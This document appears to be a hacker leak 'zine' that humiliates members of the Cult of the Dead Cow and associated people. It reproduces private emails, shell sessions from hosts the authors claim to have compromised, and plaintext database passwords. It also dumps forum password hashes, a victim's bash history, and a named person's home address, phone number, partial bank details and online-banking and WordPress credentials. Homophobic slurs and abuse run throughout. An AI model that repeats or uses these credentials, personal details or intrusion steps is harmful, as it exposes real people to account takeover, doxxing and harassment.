-> Hey, you didn't bug me too much about the app -- I was just dragging my
-> feet. For a long time I lost the original source code, and then when I found
-> it I didn't have vb installed on my laptop any more. So it's been kind of a
-> back burner kind of thing.
-Cool, I just worry that I get overzealous about this stuff at times.
-The app is still gonna come out, you've got my word on that. Probably
-Tuesday or Wednesday; I try to limit my blog posting to one per day,
-and tomorrow's probably going to be the cDc book. There are some
-graphics and t-files and audio ready, too. I'll hit G.Ratte' up in a
-minute and try to get a firm date.
-> You know, to tell you the truth I kind of lost interest in the whole cDc
-> thing for a bit. We've talked about this before, but I just had this
-> misperception that there would be like, you know, weekly meetings and secret
-> handshakes or something, where we would all get together and work on
-Yeah, I know what you mean. I've gone through several periods of
-loss-of-interest in cDc stuff. I'm glad you're back, though. It's
-all about having people such as yourself that actually do stuff.
-As for secret handshakes, that we do have (really). Check this out:
-That's the first secret handshake; one person puts his/her arms around
-another person with the hands in the position that Mudge's hands are
-in, then the second person milks the thumbs as if they were udders. I
-guess it's not that secret, since there's a picture of it on the web,
-hah. There's a second secret handshake that I can't remember right
-> projects. I'm sure you remember my initial frustrations on the lack of
-> organization in the beginning. That's the main reason I kind of blew off my
-> plans to go to Defcon. But over the past few weeks, it's like people have
-Yeah, people come together around the cons and shit gets done. In
-between cons, though, not much happens. We try to keep things afloat
-with t-files and stuff, but the con-stuff is pretty much when it
-happens. That's not always true; Oxblood's got his stuff with the
-Dalai Lama and whatnot that keeps us in the news (especially lately),
-but for the most part, it's the silly hacker cons that are our "bread
-and butter," doing-stuff-wise (and media-wise). I guess it's because
-we sort of a have a captive audience at the cons; it's people who are
-definitely interested in our stuff, for the most part, and the media
-shows up, too. I'm not saying this is the way it should be, but this
-is the way that it has always been, in my experience.
-> started coming together. I think I see cDc as less of a cohesive group and
-> more of just a think tank of cool people. I think I was waiting for other
-> people to do cool stuff all this time and I finally see that it's not like
-> that, it's more about doing stuff on your own and getting help/support with
-Yeah, cDc is not really a cohesive group with real goals or anything
-like that. It's really just a brand in search of a product; the group
-(the name, really) is symbiotic with its various members. People do
-stuff, put cDc's name on it, get more notice than they were likely to
-have gotten if they'd self-released it. In turn, the brand is
-strengthened. It's a cool concept when there's stuff going on,
-otherwise it canbe frustrating. Definitely the think tank idea is
-something we're trying to promote, as well.
-> those projects. At least that's what I think right now, heh. The Flack man's
-> opinion is always subject to change, haha.
-Hah, yeah, that's the way it should be. Things are pretty good,
-cDc-wise, right now, but I'm not sure that I'll always think that's
-true. I get tired of being the only one posting on the main blog, for
-instance, especially given that there are 20ish others with posting
-access. Well, Krass Katt posts sometimes, but she's the exception
-lately...anyway, I ramble. Things are pretty good, but shit happens
-and people move in and out of the "cDc circle" or whatever and things
-can change. Hopefully things will stay good, but there are never any
-guarantees. We need to milk (hah) this recent media attention, which
-we've done a reasonable job of so far, but it needs to continue. G.
-Ratte' told me that the word on the street at HOPE was that a lot of
-the younger kids don't know who we are anymore; that was kind of
-shocking, but I believe it. Ever onward, though, gotta keep it
-poppin' fresh. Heh.
-> I am honored to have the cDc badge on batch-0-matic. It's pretty cool to
-> think that people might download it and use it in ways I never even thought
-> of. That would be awesome.
-Yeah, that'd be rad. That's the whole symbiotic brand-thing. We (the
-group, collectively) hype your project and in turn hype ourselves. I
-really am pushing for this to get released; sorry it's been a bit of a
-delay on my part. The whole Defcon thing happened, then there was the
-stuff about Tibet and whatnot, and then I've been actually busy at
-work for the past week (work is where I usually do cDc stuff), but I'm
-pushing to get it out ASAP.
-> Cool deal on the cDc book. I kind of got pushed into a time crunch and had
-> to order 30 copies right off the bat before ordering one print copy in
-> advance. I know it's a gamble but I plan on debuting it August 19th at OVGE
-> (a local videogame exhibition) and I don't have time for two rounds of
-> printing/shipping before then. After the debut I'll start pushing it online
-> and stuff. I read a quip that said the average self-published book sells
-> about 200 copies. I don't want to get my hopes up, but that seems pretty
-> low.
-Yeah, 200 seems low. Still, 200 copies is decent. I'm thinking that,
-if I sell enough copies of the cDc book to pay for it, I'll buy some
-to consign in local bookstores. Also, maybe do the
-amazon-listing-thing (apparently, you have to manage your own
-inventory to do that, at least, if I'm understanding it correctly).
-I'd also like to get copies into the local libraries, not sure how to
-go about doing that. It'd be kind of fun(ny), though. Thanks for the
-insight into lulu; I'm pretty happy with the one copy I got (though
-there were errors in it -- my fault, not theirs -- that have since
-been corrected...I guess that's the point of a "preview copy"...and
-hey, now my copy is a collectors' item, since it's got errors. Hah).
-> I haven't figured out a good way around their royalty rates for people
-> either, unless like you said I order a bunch of copies and then ship them
-> out to people. Still, that'd be cheaper for them to pay for the book and
-> priority shipping. I dunno. I guess this is where a marketing plan would
-> have come in handy. I also need to get a crash course in PR writing and
-> submit something about the book to some online PR sites as well as a few
-> newspapers.
-Did DaYuM help you with the PR stuff? I saw that you'd asked her to
-on the forum, but I can't recall if she replied. Good idea on selling
-the stuff royalty-free to friends and such (eliminating the royalty
-before the public release); I've sold 15 copies to cDc people, not
-bad. I'd have expected a few more, but money's tight for a lot of
-people, definitely understandable.
-> I don't know how much you messed with b0m, but the drop down menu pulls text
-> from standalone .txt files and imports them into the program. I think that's
-> what Mixter/Ratte were talking about wanting that Google app to be able to
-> do. We could offer packs of .txt files with the latest "h0t hack3r qu3ries"
-> that people could download and unzip (and of course write and share their
-> own). I already have the drop-down code and the web query code from b0m, all
-> I have to do is get them working in a new stand alone app. I'm thinking
-> it'll be ugly, but working by cob tomorrow.
-I like your google app concept; Mixter seemed to dig it, too, though
-you're right that it's geared toward a single platform. Still, it's
-good work that could/should be used somehow, I think.
-Take care, man. How'd the book release at OVGE go?
-Sorry again for the lateness of the reply.
-FTPD deets:
-Stat_LastLogin=3/28/2008 2:51:37 PM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=11/9/2007 1:57:58 PM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=7/13/2007 8:25:42 PM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=11/24/2006 2:30:13 PM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=11/30/2006 9:43:25 AM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=1/7/2007 4:52:24 PM
-Home-Ip=-= All IP Homes =-
-Stat_LastLogin=3/19/2008 12:55:57 PM
-NSF raw MD5 hashes:
-Punkle Jones:536acd279c5c4026cbf879cb49219698
-Howard Campbell 3rd:de4d58c16c5488a5fffdbf695d58ffae
-spyrax fluxxeon:102651c4d82eef7e8662d3eaf41f153c
-jacksom cole:c150661e828cf06593e03696a03b19fc
-R. C. Hoagland:d57784cffb28277368183d130a7ef225
-Captain Ahab:0a17d47a4d82d942a02b5e388c61b2ff
-DJ Stryker:1a9e3329a0bb826c3f7c5e20bc62a675
-buy tramadol:765ac7c7f90f5e2cbb62753f9d92aa0e
-Viagra Online:2df4455558508b94b2411639570dbd07
-juan cux:0636e9fdd8cc88ba68088febbb449cb8
-ian gray:ac42f9a7207786f2f591228641e01371
-Playa Of Da Day:ffc2d324f9056827e736b3e996ee7776
-NSF phpass hashes (we wrote a cracker for this but obviously it's slow as
-Myles Long:$P$BQ0J3AF/sPHtcCh21dX2YA.ITGz56V/
-Elliot Pank:$P$BS6Bwo5Bb9WmmOJDctq/2jp8k5upxt/
-Flack, why do you insist on aligning yourself with these faggots, playing the
-hacker game, and also storing your home videos on your host? We could have
-quite easily released them. We know you ain't no hacker. Do us and yourself a
-favour and get out of this circlejerk.
-Superheroes > Ninjas.
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-Oxblood Ruffin. Legendary hacker, leader to thousands, the mind behind the hardcore political
-movement HACKTIVISMO, the man so many young kids aspire to be. Or not. Laird Brown, as he is
-better known to his friends (reporters), is a shmuck. He is nothing but a gobshite. Running his
-mouth around the internet bigging up cDc, his lame hacktivismo and let's not forget his blogs.
-You see, CDC have this thing, they tell hackers that they are not hackers, but then they tell
-the media that they are. To some extent I believe Ratte about this, but then why have this
-faggot Oxblood run around talking about sec related stuff that he knows nothing about.
-"About The Author
-Oxblood Ruffin is a member of the CULT OF THE DEAD COW (cDc) and Executive Director of Hacktivismo.
-He uses technology to improve human rights. Oxblood wrote the
-Hactivismo Declaration and co-aurthored the Hacktivismo Enhanced-Source Software License Agreement
-^ wtf, i think my description is better. I mean he makes it sound like he is the internet's Martin
-Luther King Jr.
-Anyway, yeah..we owned him, here's his shit.
-$ uname -a; id
-FreeBSD 5.5-PRERELEASE FreeBSD 5.5-PRERELEASE #0: Tue Mar 28 11:28:25 GMT
-uid=1050(lairdbrown) gid=1047(lairdbrown) groups=1047(lairdbrown)
-$ ls -la /home/lairdbrown/
-total 108
-drwxr-x--x 12 lairdbrown lairdbrown 512 Aug 25 2006 .
-drwxr-x--x 726 root wheel 14336 Apr 1 11:16 ..
--rwxr-xr-x 1 lairdbrown lairdbrown 771 Jun 24 2005 .cshrc
--rwxr-xr-x 1 lairdbrown lairdbrown 166 Jun 24 2005 .forward
--rwxr-xr-x 1 lairdbrown lairdbrown 255 Jun 24 2005 .login
--rwxr-xr-x 1 lairdbrown lairdbrown 165 Jun 24 2005 .login_conf
--rwxr-xr-x 1 lairdbrown lairdbrown 371 Jun 24 2005 .mail_aliases
--rwxr-xr-x 1 lairdbrown lairdbrown 331 Jun 24 2005 .mailrc
--rwxr-xr-x 1 lairdbrown lairdbrown 1605 Jun 24 2005 .procmailrc
--rwxr-xr-x 1 lairdbrown lairdbrown 801 Jun 24 2005 .profile
--rwxr-xr-x 1 lairdbrown lairdbrown 852 Jun 24 2005 .shrc
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 .ssh
-drwxr-xr-x 3 lairdbrown lairdbrown 512 Aug 25 2006 .usermin
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 Maildir
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 cgi-bin
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 etc
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 homes
-drwxr-xr-x 2 lairdbrown lairdbrown 1024 May 6 00:20 logs
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Dec 18 2006 php-fastcgi
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Jun 24 2005 svn
-drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 web
-$ ls -la /home/lairdbrown/web/public/
-total 60
-drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 .
-drwxr-xr-x 3 lairdbrown lairdbrown 512 Jun 24 2005 ..
--rw-r--r-- 1 lairdbrown lairdbrown 318 Nov 13 2005 .htaccess
--r--r--r-- 1 root lairdbrown 89 Aug 27 2006 .textdrive
--rw-r--r-- 1 lairdbrown lairdbrown 6660 Dec 29 2005 HISTORY.txt
--rw-r--r-- 1 lairdbrown lairdbrown 1384 Dec 29 2005 README.txt
-drwxr-xr-x 4 lairdbrown lairdbrown 512 Jun 24 2005 _ical
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 files
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 images
--rw-r--r-- 1 lairdbrown lairdbrown 845 Aug 26 2005 index.php
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 rpc
-drwxr-xr-x 10 lairdbrown lairdbrown 512 Apr 23 22:23 textpattern
-$ ls -la /home/lairdbrown/web/public/textpattern/
-total 172
-drwxr-xr-x 10 lairdbrown lairdbrown 512 Aug 27 2006 .
-drwxr-xr-x 7 lairdbrown lairdbrown 512 Sep 1 2006 ..
--rw-r--r-- 1 lairdbrown lairdbrown 264 Aug 27 2006 config.php
--rw-r--r-- 1 lairdbrown lairdbrown 638 Aug 26 2005 config.php.default
--rw-r--r-- 1 lairdbrown lairdbrown 445 Sep 24 2005 css.php
-drwxr-xr-x 3 lairdbrown lairdbrown 1024 Aug 27 2006 include
--rw-r--r-- 1 lairdbrown lairdbrown 2954 Dec 26 2005 index.php
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 lang
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 1 2006 lib
--rw-r--r-- 1 lairdbrown lairdbrown 15127 Aug 26 2005 license.txt
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 publish
--rw-r--r-- 1 lairdbrown lairdbrown 31467 Dec 29 2005 publish.php
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 setup
--rw-r--r-- 1 lairdbrown lairdbrown 5946 Dec 26 2005 textpattern.css
--rw-r--r-- 1 lairdbrown lairdbrown 1596 Dec 18 2005 textpattern.js
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Sep 16 2006 tmp
-drwxr-xr-x 2 lairdbrown lairdbrown 1024 Aug 27 2006 txp_img
-drwxr-xr-x 2 lairdbrown lairdbrown 512 Aug 27 2006 update
-$ cat config.php
-$txpcfg['db'] = 'lairdbrown';
-$txpcfg['user'] = 'lairdbrown';
-$txpcfg['pass'] = 'UjCast4Knod';
-$txpcfg['host'] = 'localhost';
-$txpcfg['table_prefix'] = '';
-$txpcfg['txpath'] = '/users/home/lairdbrown/web/public/textpattern';
-$txpcfg['dbcharset'] = 'utf8';
-And if you are wondering what this douchebag's pw is, it's "cow666". Fuck.
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-Dear Everyone, I'm an idiot.
-I thought that I was replying directly to Kevin on my last post and it
-turns out that this wasn't the case.
-Here's the deal. Hacktivismo has worked on a Web auditing tool based
-on "Google hacking" for the past year. Mixter came up with the idea,
-and eventually I found a great German programmer named Thomas Gehrsitz
-[handle = init0] to pull the whole thing together. He did a great job.
-This app works great and is gonna be released in mid-January.
-I asked Kevin some time ago if we could bring Thomas into the cDc.
-IMO, he's a great addition; he gets the cDc; and he'd make us all
-proud. Kevin thought about it and agreed. But there are also some
-special considerations.
-There are some new laws on the books in Germany WRT to "computer
-security". These are basically very wide-ranging laws that make it
-illegal to do security research unless you work for the government or
-a "recognized" security firm. There are also other implications.
-So I want to bring in Thomas but I also want to cover his ass, and
-Mixy's too.
-Maybe the German government won't care about the scanner. Cool. Then
-later we say that it was Mixy's idea and Thomas programmed it. But for
-right now we feel that it's best just to let KrassKat take the
-programming credit.
-Anyway, that's the dealey. Thomas is a great guy with loads of
-connections in Germany/Europe. We're lucky to get him, IMO.
-I wasn't trying to be deceptive with anyone in the herd, just trying
-to keep this "hush-hush" to protect our German friends in case things
-might get out of hand in the fatherland.
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-hacktivismo users/emails/hashes
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-I have been quite graciously drafted into the CULT OF THE DEAD COW's
-Ninja Strike Force. Curious what that means? It means I'm now a part of
-the most elite public collective. Their name appears in hundreds of
-books, including text books. There isn't all that much more to say about
-it than that. Expect me to start churning out the most badass tools and
-information in the name of the cDc NSF.
- / 1ll3g4l4life
-// ** MySQL settings ** //
-define('DB_NAME', 'blog'); // The name of the database
-define('DB_USER', 'comradesmack'); // Your MySQL username
-define('DB_PASSWORD', '1ll3g4l4life'); // ...and password
-define('DB_HOST', ''); // ...and the server MySQL is
-running on
-~~~~~~~~~~ His lame bookmarks ~~~~~~~~~~~~
-~~~~~~~~~~~~~~~ 0wned ~~~~~~~~~~~~~~~~~~~~~
-$ ls -la
-total 60
-drwxr-x--x 8 comradesmack pg1268972 4096 Jan 13 00:10 .
-drwxr-x--x 38 root 1000 4096 Jan 16 02:29 ..
--rw-r--r-- 1 comradesmack pg1268972 260 Nov 27 1999 .alias
--rw------- 1 comradesmack pg1268972 4480 Jan 13 00:10 .bash_history
--rw-r--r-- 1 comradesmack pg1268972 81 Nov 20 2002 .bash_profile
--rw-r--r-- 1 comradesmack pg1268972 55 Nov 27 1999 .bashrc
--rw-r--r-- 1 comradesmack pg1268972 417 Nov 8 2000 .cshrc
-drwx------ 2 comradesmack pg1268972 4096 Oct 26 16:58 .links
-drwxr-xr-x 2 comradesmack pg1268972 4096 Jan 10 18:52 .ssh
--rw------- 1 comradesmack pg1268972 7687 Jan 13 00:10 .viminfo
-drwx------ 10 comradesmack pg1268972 4096 Aug 29 16:36 Maildir
-drwxr-xr-x 17 comradesmack pg1268972 4096 Jan 15 13:18
-drwxr-xr-x 7 comradesmack pg1268972 4096 Jul 25 08:11
-dr-xr-x--- 3 comradesmack dhapache 4096 Jun 5 2007 logs
-$ cat .bash_history
-ls -l
-vi .htaccess
-cd cms
-vi .htacess
-grep htaccess
-cd ..
-cd ..
-cd logs
-cd http
-cd ..
-cd ..
-cd ..
-cd Maildir/
-cd cur
-cd ..
-cd ..
-cd cms
-cp wp-login.php /home/comradesmack/
-cd ..
-cd admin
-cd ..
-ls -a
-cd cms
-ls -a
-vi .htaccess
-vi wp-login.php
-cd ..
-cd admin
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-cd ..
-cd cms
-cd wp-content
-cd themes
-cd drunklosertemplate2/
-cd drunkloser/
-cd ..
-cd ..
-cd ..
-cd ..
-cd ../../..
-cd ..
-cd ..
-cd ..
-cd ..
-cd home
-cd comradesmack
-vi .htaccess
-vi .htaccess
-vi .htaccess
-cd cms
-vi .htacceess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-cd cms
-cd wp-con
-cd wp-content
-cd plugins
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-cd /home
-cd comradesmack
-vi .htaccess
-cd /cms/wp-content/plugins
-cd cms
-cd wp-content/plugins
-rm .htaccess
-cd /home/comradesmack
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi emailpop.html
-vi emailpop.html
-vi emailpop.html
-vi emailpop.html
-cd othershit/
-vi emailpop.html
-vi emailpop.html
-cd othershit/
-vi emailpop.html
-vi .htaccess
-cd books/
-vi .htaccess
-apt get
-apt-get ruby
-cd ..
-apt-get install ruby
-find apache
-ls -l
-ls -aL
-ls -a
-alias ls -l ll
-man alias
-alias /?
-alias help
-help alias
-alias ll=ls -l
-alias ll="ls -l"
-alias ll="ls -a"
-alias ll="ls -l"
-alias ll="ls -al"
-vi .htaccess
-vi denied.html
-vi denied.
-vi denied.html
-vi denied.html
-cd books
-ls > books.txt
-rm books.txt
-vi .htaccess
-cd othershit/
-cd othershit/
-vi scr-bx
-vi wserv
-vi BitchX
-cd othershit
-chmod BitchX 777
-chmod 777 BitchX
-cd ..
-cd ..
-cd ..
-cd /home
-cd /comradesmack
-cd /comsma
-vi denied
-vi denied.html
-vi endofnet.html
-vi endofnet.html
-vi endofnet.html
-vi endofnet.html
-find stuff
-find Stuff
-whereis Stuff
-cd Stuff
-su fuckme
-ssh -f -N -R 10000:localhost:22 comradesmack@
-ps -aux | grep sshd
-cd cms
-cd wp-admin
-cd ..
-vi .htaccess
-cd wp-admin
-vi .htaccess
-cd ..
-cd /admin
-cd ..
-cd /admin
-cd admin
-vi .htaccess
-cat /etc/passwd
-cat etc/passwd > passwd.txt
-cd ..
-cat etc/passwd > passwd.txt
-vi passwd.txt
-cat etc/passwd > passwd.txt
-cat /etc/passwd > passwd.txt
-vi passwd.txt
-cat /etc/shadow
-cat /etc/httpd/conf/httpd.conf
-cd ..
-cd com
-cd trinitywiki/
-cd MediaWIKI/
-cd mediawiki-1.6.10/
-chmod 777 INSTALL
-vi config/
-cd config/
-cd /
-cd home
-cd comsma
-cd cms
-cd cms
-vi wp-config.php
-cd ..
-cd trinitywiki/
-vi LocalSettings.php
-cd trinitywiki/
-vi LocalSettings.php
-ls -l
-chmod 777 images
-vi LocalSettings.php
-vi LocalSettings.php
-vi LocalSettings.php
-vi LocalSettings.php
-vi LocalSettings.php
-vi LocalSettings.php
-rm -rf MediaWIKI
-cd ma
-cd math
-cd ..
-ls -l
-cat FAQ
-vi LocalSettings.php
-cp LocalSettings.php LocalSettings2.php
-vi LocalSettings
-vi LocalSettings.php
-vi LocalSettings.php
-rm LocalSettings.php
-cp LocalSettings2.php LocalSettings.php
-cd trinitywiki/
-vi LocalSettings.php
-vi LocalSettings.php
-vi LocalSettings.php
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-vi .htaccess
-ls -l
-ls -a
-rm .htaccess.swp
-ls -a
-vi .htaccess
-vi .htaccess
-vi .ht
-vi .htaccess
-$ cat .ssh/known_hosts
- ssh-rsa
-$ ls -la
-total 944
-drwxr-xr-x 19 comradesmack pg1268972 4096 May 8 09:09 .
-drwxr-xr-x 9 comradesmack pg1268972 4096 Mar 28 13:11 ..
--rw-r--r-- 1 comradesmack pg1268972 292 May 8 09:20 .htaccess
--rw-r--r-- 1 comradesmack pg1268972 15503 Apr 11 15:28 1.tsk
--rwxr-xr-x 1 comradesmack pg1268972 90871 Nov 26 08:25 1559621337_l.jpg
--rw-r--r-- 1 comradesmack pg1268972 3744 Mar 28 13:11 41index.html
-drwxr-xr-x 2 dhapache dhapache 4096 Dec 19 07:45 admin
-drwxr-xr-x 3 comradesmack pg1268972 4096 Oct 26 2007 b2ds
-drwxr-xr-x 9 comradesmack pg1268972 4096 Feb 1 13:40 backup-manager-0.6.3
--rwxr-xr-x 1 comradesmack pg1268972 5 Feb 21 10:57 bleh
--rwxr-xr-x 1 comradesmack pg1268972 198707 Dec 19 12:59 bookmarks.html
-drwxr-xr-x 2 comradesmack pg1268972 8192 Aug 15 2007 books
-drwxr-xr-x 8 comradesmack pg1268972 4096 Dec 19 07:45 cal
--rw-r--r-- 1 comradesmack pg1268972 43723 Apr 11 15:15 cdc.jpg
--rw-r--r-- 1 comradesmack pg1268972 17722 Apr 11 15:15 cdc.png
-drwxr-xr-x 5 comradesmack pg1268972 4096 Apr 29 05:58 cms
--rw-rw-rw- 1 comradesmack pg1268972 78 Mar 17 09:17 code.txt
--rwxr-xr-x 1 comradesmack pg1268972 928 Dec 12 13:27 copyleft.html
--rwxr-xr-x 1 comradesmack pg1268972 1540 Aug 29 2007 denied.html
-drwxr-xr-x 14 comradesmack pg1268972 4096 Oct 4 2007 dp
--rwxr-xr-x 1 comradesmack pg1268972 732 Sep 6 2007 endofnet.html
--rwxr-xr-x 1 comradesmack pg1268972 4846 Jun 6 2007 favicon.ico
--rw-r--r-- 1 comradesmack pg1268972 199102 Feb 29 09:25 fox.html
--rwxr-xr-x 1 comradesmack pg1268972 1369 Feb 20 14:00 goolag.html
-drwxr-xr-x 2 comradesmack pg1268972 4096 May 6 12:15 images
--rwxr-xr-x 1 comradesmack pg1268972 609 Jan 28 12:28 index.html
--rwxr-xr-x 1 comradesmack pg1268972 94 Jan 11 13:31 index_o.php
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--rwxr-xr-x 1 comradesmack pg1268972 3977 Jan 30 11:57 logobutton.png
-drwxr-xr-x 18 comradesmack pg1268972 4096 Sep 7 2007 m00sik
--rwxr-xr-x 1 comradesmack pg1268972 10067 Jan 30 12:01 menubar.png
-drwxr-xr-x 4 comradesmack pg1268972 4096 Apr 1 13:36 othershit
--rwxr-xr-x 1 comradesmack pg1268972 47748 Oct 1 2007 passwd.txt
-drwxr-xr-x 2 comradesmack pg1268972 4096 Aug 17 2007 personal
-drwxr-xr-x 3 comradesmack pg1268972 4096 Feb 19 14:48 pr0n
--rw-r--r-- 1 comradesmack pg1268972 56 Mar 15 15:03 proj.txt
--rwxr-xr-x 1 comradesmack pg1268972 165 Jan 28 13:37 refer.php
-drwxr-xr-x 2 comradesmack pg1268972 4096 Jul 30 2007 research
--rw-r--r-- 1 comradesmack pg1268972 8318 Mar 26 13:25 session.php
--rwxr-xr-x 1 comradesmack pg1268972 35076 Mar 10 10:47 sitemap.xml
--rwxr-xr-x 1 comradesmack pg1268972 3717 Mar 10 10:47 sitemap.xml.gz
--rw-rw-rw- 1 comradesmack pg1268972 136 Mar 17 09:10 test.html
--rw-r--r-- 1 comradesmack pg1268972 101 Mar 13 10:04 test.php
--rw-r--r-- 1 comradesmack pg1268972 74 Mar 15 01:08 tester.php
-drwxr-xr-x 14 comradesmack pg1268972 4096 Dec 12 12:52 trinitywiki
-drwxr-xr-x 4 comradesmack pg1268972 4096 Jul 30 2007 wp-admin
-drwxr-xr-x 5 comradesmack pg1268972 4096 Jul 30 2007 wp-content
-drwxr-xr-x 4 comradesmack pg1268972 4096 Jun 20 2007 wp-includes
-$ du -hs
-103M /home/.tasha/comradesmack/
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-dildog - one of the two "hackers" the cdc point to from the 90s that they
-built rep on.
-Christien Rioux - zuul69
-password for every linkedin, wordpress, support forum, sales website in
-existence: zuul69 or zuul6969 or Zuul69
-781 899 7202
-Christien Rioux
-294 Linden St
-Waltham, MA 02452
-This guys has more contacts than a spammer. His whole life, online and off,
- is in this inbox.
-When L0phtCrack was purchased by @stake (by way of Directed Doodling,
-and 'SST'), there was some language that you had placed in the
-contract that, if i am correct, would result in a reversion of
-ownership to the original authors in the event that the program is not
-made commercially available for more than a year.
-If you could take a quick look for a copy of that contract in your
-files, that would be great. We are considering commercializing the
-product again in a slightly different form if we can get Symantec (the
-last owners) to cough it up. We feel they are still bound by these
-agreements, and we'd like to find fresh copies of them, and get an
-opinion on how to proceed.
-Bank of America (
-Acct #00461735XXXX
-Routing ABA #01100XXXX
-Wire ABA #02600XXXX
-Online ID at is: bitmark1091
-Online passcode is: B1tm4XXXX (capital B-one-tm-four-XXXX)
-Debit/ATM card is in the mail for both us.
-// X's have been inserted by ZF0. We're too kind. We do archive though.
-your wordpress account is:
-l: sthayer
-p: suffolk!!
-l0pht chats:
-Space Rogue:
-My favorite line,
-"and Space Rogue (still Space Rogue)" HA!
-- SR
-Paul Nash: Who is designing the limited run '08 l0pht reunion tour tshirts?
-Peiter Mudge Zatko: That would be cool. Why does everyone keep calling me
-Division Scientist? I'm...
-Ya, know for a bunch of people who were very close friends we sure have
-messed things up. The only person I ever had any ill will against was Mudge
-and while that is not a hundred percent resolved and probably never will be
-I've tried to put it behind me. As for the wedding I don't think I ever
-officially knew you two were married I just assumed it I think. I suspect at
-the time of your wedding I probably wasn't a very socialable person anyway
-and most likely would not have attended even if invited. Invitations or lack
-thereof to things like weddings and such don't bother me. Those are rather
-personal events and it doesn't bother me in the least if I am or I am not
-- SR
-On 4/18/08 8:13 PM, "Stacy Thayer" <> wrote:
-> I'm sorry you weren't invited to our wedding. Not that it was a thing...and
-> look how it turned out. But, he thinks you don't like him.
-Don't worry, Cris, I like ya just fine.
-Things definitely got pretty distant after people started trickling
-away from @stake. I can't say that I've done a very good job of
-maintaining any kind of social behavior whatsoever. That said, I've
-always been more concerned that if I make a whole bunch of friends
-that I wouldn't be able to maintain the relationships responsibly,
-when I made all that company stuff my top priority. It's coming up on
-ten years that I will have been fighting to finish the software I
-started on in 2000. I suppose this is what I was meant to do :P And
-frankly, if it doesn't work out for me, I'm going to be hella pissed
-and I'm going to be even more intolerable for a while (if that's
-Anyway, I dont want anyone to think my distance has been because I
-dont like them. I dont know how anyone got that idea from me, other
-than the fact that I've been a pretty grumpy dude lately in general. I
-suppose you might know what that's like ;)
-'ll put up whatever you guys want, just send me the links. I'd rather post
-links than host content though but as long as it is text that should be OK.
-At the same time I'd rather not have hundreds of links to crap, just the
-juicy stuff. I added the Cyber UL since it seems to be getting some press
-lately and the Buffer Overflow thing since it is listed in Mudge's wikipedia
-Speaking of which we can add all the advisories to the Wikipedia page, I
-have no qualms about editing it myself as long as someone sends me the
-links. Or is one of the VDB's out there have a cool search engine where we
-can link to all the old advisories at once that would be cool to.
-I'll add the dates to the pages as soon as I have ten minutes. Same for your
-email forward Tan. Probably Wednesday.
-I have two accounts with, and I wish to cancel -one- of
-them since it's not configured correctly and I dont need to be paying
-The credentials are:
-login: bitmark1091
-password: B1tm4rk00
-secret question: Pet's name
-secret question answer: Monkey
-Please terminate that account. Thanks.
- .-. _ _ .-.
- / \ .-. ((___)) .-. / \
- /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \
--/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\-
-/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\
- \ / `-' (U) `-' \ /
- `-' `-'
-# _ ___ _ ___ _ __
-# | | / _ \ | |__ \| |/ /
-# | |__ | | | |_ ___ __ ___ __| | ) | ' /
-# | '_ \| | | \ \ /\ / / '_ \ / _ \/ _` | / /| <
-# | |_) | |_| |\ V V /| | | | __/ (_| |/ /_| . \
